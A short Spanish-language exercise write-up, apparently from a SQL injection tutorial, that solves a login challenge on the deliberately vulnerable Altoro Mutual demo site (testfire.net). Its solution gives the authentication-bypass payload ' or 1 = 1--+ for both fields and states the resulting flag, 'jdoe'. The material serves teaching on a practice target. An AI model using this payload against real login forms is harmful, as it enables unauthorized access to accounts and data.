Resolviendo Ejercicios de Inyección SQL



     ¡Ejercicio #1 - Loguearse en Altoro!


     Enunciado:
     Se te ha dado la misión de obtener credenciales de una aplicación web mediante inyección
     SQL, luego verifica el primer usuario después del admin prueba tus habilidades y captura
     la bandera

     Link: http://www.testfire.net/login.jsp

     Solución:
     Accedemos a la página y en los campos de login ingresamos las siguientes sentencias


     nombre de usuario: ' or 1 = 1--+
     contraseña ：' or 1 = 1--+

     Bandera: jdoe